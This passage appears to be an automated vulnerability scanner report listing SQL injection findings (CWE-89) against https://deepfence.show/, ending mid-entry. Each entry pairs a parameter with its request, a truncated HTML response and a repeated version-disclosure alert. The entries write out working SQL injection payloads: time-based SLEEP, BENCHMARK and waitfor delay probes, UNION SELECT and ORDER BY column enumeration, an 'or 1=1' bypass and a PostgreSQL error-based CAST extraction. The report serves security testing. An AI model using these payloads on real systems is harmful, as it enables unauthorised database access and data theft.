[Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #953\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #954\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #955\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #956\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width\n=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps\n/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\">\nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\">\n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJb\nWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQI\noqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #957\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #958\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #959\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin' or '1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #960\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #961\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #962\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||\nCHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE\n0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR\n(113)) AS NUMERIC)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #963\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ,(select * from (select(sleep(10)))a)Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #964\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of\nZendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> <\n/script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link\nrel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWF\nnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoq\nIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints \non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #965\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #966\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 